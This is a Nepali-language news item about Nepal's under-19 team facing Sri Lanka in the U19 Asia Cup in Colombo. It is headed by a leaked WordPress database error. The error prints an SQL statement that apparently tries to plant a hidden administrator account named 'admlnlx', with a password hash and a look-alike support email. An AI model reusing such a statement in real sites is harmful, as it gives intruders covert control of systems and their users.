WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BV0d0P3dCjRTHKgmobnn0VFm4v26yx1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-28 05:00:27', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर ३०–
एशिन क्रिकेट काउन्सिको आयोजनामा सुरु भएको यु १९ एशिया कप क्रिकेटमा आज नेपालले घरेलु टोली श्रीलंकाविरुद्ध खेल्दै छ ।
खेल नेपाली समय अनुसार विहान सवा १० बजे कोलोम्बोको एनसिसि मैदानमा हुनेछ । अष्ट्रेलियाबाट प्रशिक्षण लिएका फर्किएका नेपाली कप्तान सन्दिप लामिछाने र नयाँ अनुहारका युवा खेलाडीले भरिएको नेपाली टोली उच्च मनोबलका साथ मैदानमा उत्रिदै छ । टेष्ट राष्ट्रसंग भिड्न लागेकोले नेपाली टोली आज जित हासिल गरे प्रतियोगितामा राम्रो प्रभाव जमाउने छ । नेपाली टोलीले प्रतियोगितामा सेमीफाईनल सम्मको लक्ष्य लिएको छ । नेपाली टोलीको प्रशिक्षकामा पूर्व राष्ट्रिय खेलाडी विनोद दास रहेका छन् ।